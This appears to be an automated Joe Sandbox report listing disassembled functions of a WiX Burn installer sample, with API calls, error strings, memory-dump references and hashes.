                                                                                                                                                                                                                                                                                                  • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 213125376-288575659
                                                                                                                                                                                                                                                                                                  • Opcode ID: bf6215a796587f3cf685679865f52abc197aadc6391faef094ef79b6e7a10ed9
                                                                                                                                                                                                                                                                                                  • Instruction ID: edd1ce584b3b894986c4af066cbb1c221342feef0287131cbf483fa521d94028
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf6215a796587f3cf685679865f52abc197aadc6391faef094ef79b6e7a10ed9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E41A272900229ABDB208BA5DC45BDEBFB8FF09750F118165FA18EB254D771E940CBA1
                                                                                                                                                                                                                                                                                                  Function 0088C774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to recreate command-line arguments., xrefs: 0088CA43
                                                                                                                                                                                                                                                                                                  • Failed to copy install arguments for passthrough bundle package, xrefs: 0088CA62
                                                                                                                                                                                                                                                                                                  • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0088CA05
                                                                                                                                                                                                                                                                                                  • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0088CAAC
                                                                                                                                                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle., xrefs: 0088C988
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0088C9AD
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0088C7B4
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0088C9E7
                                                                                                                                                                                                                                                                                                  • Failed to copy filename for passthrough pseudo bundle., xrefs: 0088C9BE
                                                                                                                                                                                                                                                                                                  • Failed to copy download source for passthrough pseudo bundle., xrefs: 0088C98F
                                                                                                                                                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0088C9C5
                                                                                                                                                                                                                                                                                                  • Failed to copy related arguments for passthrough bundle package, xrefs: 0088CA82
                                                                                                                                                                                                                                                                                                  • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0088C9B7
                                                                                                                                                                                                                                                                                                  • pseudobundle.cpp, xrefs: 0088C7A8, 0088C9A1, 0088C9DB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-115096447
                                                                                                                                                                                                                                                                                                  • Opcode ID: b197dd134e7c4feacf4bb844a11575fc9b366ee57fa42cd86d075ceaf1aa2372
                                                                                                                                                                                                                                                                                                  • Instruction ID: fb3813291192e14c09dbaf2a922151bbfae73792659c80571b170b35dfde04a8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b197dd134e7c4feacf4bb844a11575fc9b366ee57fa42cd86d075ceaf1aa2372
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDB12675A0061AEFCB11EF68C881F55BBA5FF08714F1181A9ED14EB356CB35E811DBA0
                                                                                                                                                                                                                                                                                                  Function 0088DE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0088DE61
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Falied to start BITS job., xrefs: 0088E019
                                                                                                                                                                                                                                                                                                  • Failed while waiting for BITS download., xrefs: 0088E012
                                                                                                                                                                                                                                                                                                  • Failed to set credentials for BITS job., xrefs: 0088DF0F
                                                                                                                                                                                                                                                                                                  • Failed to initialize BITS job callback., xrefs: 0088DF82
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job callback., xrefs: 0088DF74
                                                                                                                                                                                                                                                                                                  • Failed to add file to BITS job., xrefs: 0088DF2E
                                                                                                                                                                                                                                                                                                  • bitsengine.cpp, xrefs: 0088DE77, 0088DF6A
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job., xrefs: 0088DEF0
                                                                                                                                                                                                                                                                                                  • Invalid BITS engine URL: %ls, xrefs: 0088DE83
                                                                                                                                                                                                                                                                                                  • Failed to download BITS job., xrefs: 0088DFF8
                                                                                                                                                                                                                                                                                                  • Failed to copy download URL., xrefs: 0088DEA8
                                                                                                                                                                                                                                                                                                  • Failed to complete BITS job., xrefs: 0088E00B
                                                                                                                                                                                                                                                                                                  • Failed to set callback interface for BITS job., xrefs: 0088DF99
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-2382896028
                                                                                                                                                                                                                                                                                                  • Opcode ID: fc972bf877b022420314e3150debd1f8dcf04d0b6c27c3f110396fde418c2bda
                                                                                                                                                                                                                                                                                                  • Instruction ID: aa5dc80f9a3f373b4102be8488e95595e1e5aa390c77ec65133162b2c7cac0d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc972bf877b022420314e3150debd1f8dcf04d0b6c27c3f110396fde418c2bda
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE61A431A00725EBCB21AB94C885E5E7BB4FF08760B114556FD05EF391DBB5DD00AB91
                                                                                                                                                                                                                                                                                                  Function 0086BC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086BCE5
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0086BDF2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0086BDFC
                                                                                                                                                                                                                                                                                                  • WaitForInputIdle.USER32(?,?), ref: 0086BE50
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0086BE9B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0086BEA8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                                                                                                                                                                                                  • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 155678114-2737401750
                                                                                                                                                                                                                                                                                                  • Opcode ID: 83dcf18b396f28031bd729d356ab5fa119b992deb0aac85cf9a3e917c0e7d7df
                                                                                                                                                                                                                                                                                                  • Instruction ID: 455d66a6e65d0e921866b765b3fc18f9febf6e291c7298d323d4930eda32b129
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83dcf18b396f28031bd729d356ab5fa119b992deb0aac85cf9a3e917c0e7d7df
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD516972D0061ABBDF12AFD4CC429EEBB78FF04314B164165FA14F6211E7369E909B91
                                                                                                                                                                                                                                                                                                  Function 008869D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153serviceCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00886F28,?), ref: 00886A0B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886A18
                                                                                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886A60
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886A6C
                                                                                                                                                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886AA6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886AB0
                                                                                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00886B67
                                                                                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 00886B71
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                                                                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                                                                                                                                                                  • API String ID: 971853308-301359130
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7362298d65ff67e43e1d511028c317717797fd42e5efd91808bfb23835aeda8a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 03556ad8ab1d4a14a65ace806707bfe7769494c378c078ef2cee66ac7e65794a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7362298d65ff67e43e1d511028c317717797fd42e5efd91808bfb23835aeda8a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A641A372E40739ABD721AAA88C45EAEBBA4FF05724B058025FD11FB341F674DC1087A0
                                                                                                                                                                                                                                                                                                  Function 0086A28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A2B3
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A30E
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0086A32F
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0086A405
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0086A396
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 0086A3BD
                                                                                                                                                                                                                                                                                                  • Failed to query registry key value., xrefs: 0086A36A
                                                                                                                                                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0086A37A
                                                                                                                                                                                                                                                                                                  • Failed to open registry key. Key = '%ls', xrefs: 0086A3C7
                                                                                                                                                                                                                                                                                                  • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0086A3DD
                                                                                                                                                                                                                                                                                                  • Failed to format key string., xrefs: 0086A2BE
                                                                                                                                                                                                                                                                                                  • Failed to format value string., xrefs: 0086A319
                                                                                                                                                                                                                                                                                                  • search.cpp, xrefs: 0086A360
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16$CloseQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2702208347-46557908
                                                                                                                                                                                                                                                                                                  • Opcode ID: e053d1bb05976cffd224b6db6ecced4b505ca1ca00ed0d21ee8ada842855f21c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19b53c543bc0b6d55164e5a5d0cf2a57a0c4e87ebcaf3d1b38b3b1fe871a652b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e053d1bb05976cffd224b6db6ecced4b505ca1ca00ed0d21ee8ada842855f21c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21412632D40128BBEB266A98CD06FAEBE64FB05710F124261FD14F6392D7759E009F92
                                                                                                                                                                                                                                                                                                  Function 0086B208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0086BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B210
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B21C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                                                                                                                                                                  • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4242514867-926796631
                                                                                                                                                                                                                                                                                                  • Opcode ID: bc3e84569c8bf8db8a31ba9c4e109138cb4d469de512e2728de988fa39dede06
                                                                                                                                                                                                                                                                                                  • Instruction ID: eb6529c9d00af80fe3283d3177f4d8580947e9b1dade10f510d85c05d4f0551f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc3e84569c8bf8db8a31ba9c4e109138cb4d469de512e2728de988fa39dede06
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41412B32380710A7E7311A958C46F5B2694FF82B39B274439F911EF782D7ADC88183E6
                                                                                                                                                                                                                                                                                                  Function 0086694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0086699B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008669A5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 008669E8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008669F2
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00866B03
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3057421322-109962352
                                                                                                                                                                                                                                                                                                  • Opcode ID: 200de33653ee048461f7d5c4a19ed1813be2cd561e768317079f3fdc9321cb36
                                                                                                                                                                                                                                                                                                  • Instruction ID: e526c5c24aa1ff6e8b962bd6cae8814ec50e529e669e328604dd65c85a19b9c2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 200de33653ee048461f7d5c4a19ed1813be2cd561e768317079f3fdc9321cb36
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4441C372D002799BEB219BA58C05BEA7AA4FB09711F024199ED09F6281FB758E50CFD1
                                                                                                                                                                                                                                                                                                  Function 008648EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00865466,?,?,?,?), ref: 00864920
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00865466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00864931
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00864A6E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00865466,?,?,?,?,?,?,?,?,?,?,?), ref: 00864A77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create the message window., xrefs: 008649CC
                                                                                                                                                                                                                                                                                                  • Failed to connect to unelevated process., xrefs: 00864916
                                                                                                                                                                                                                                                                                                  • Failed to pump messages from parent process., xrefs: 00864A42
                                                                                                                                                                                                                                                                                                  • Failed to set elevated pipe into thread local storage for logging., xrefs: 008649A8
                                                                                                                                                                                                                                                                                                  • Failed to allocate thread local storage for logging., xrefs: 0086495F
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 00864955, 0086499E
                                                                                                                                                                                                                                                                                                  • comres.dll, xrefs: 008649DD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 687263955-1790235126
                                                                                                                                                                                                                                                                                                  • Opcode ID: 15f1a35e6743e225c6b370a54fb027cd78b285a7484c4a2a630e7ee6488f5e14
                                                                                                                                                                                                                                                                                                  • Instruction ID: a2f260135d30b3544fa180475a1b65142f0889be6c95853205841c4b927d80fe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15f1a35e6743e225c6b370a54fb027cd78b285a7484c4a2a630e7ee6488f5e14
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D241B373940626BBD7119BE4CC46EEFBA6CFF05751F020226BA15E3511EB34A91086E1
                                                                                                                                                                                                                                                                                                  Function 00873B4E Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00873BA2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00873BAC
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00873C15
                                                                                                                                                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00873C1C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00873CA6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get temp folder., xrefs: 00873BDA
                                                                                                                                                                                                                                                                                                  • Failed to format session id as a string., xrefs: 00873C4A
                                                                                                                                                                                                                                                                                                  • Failed to get length of temp folder., xrefs: 00873C06
                                                                                                                                                                                                                                                                                                  • Failed to copy temp folder., xrefs: 00873CCF
                                                                                                                                                                                                                                                                                                  • %u\, xrefs: 00873C36
                                                                                                                                                                                                                                                                                                  • Failed to get length of session id string., xrefs: 00873C71
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00873B61
                                                                                                                                                                                                                                                                                                  • logging.cpp, xrefs: 00873BD0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
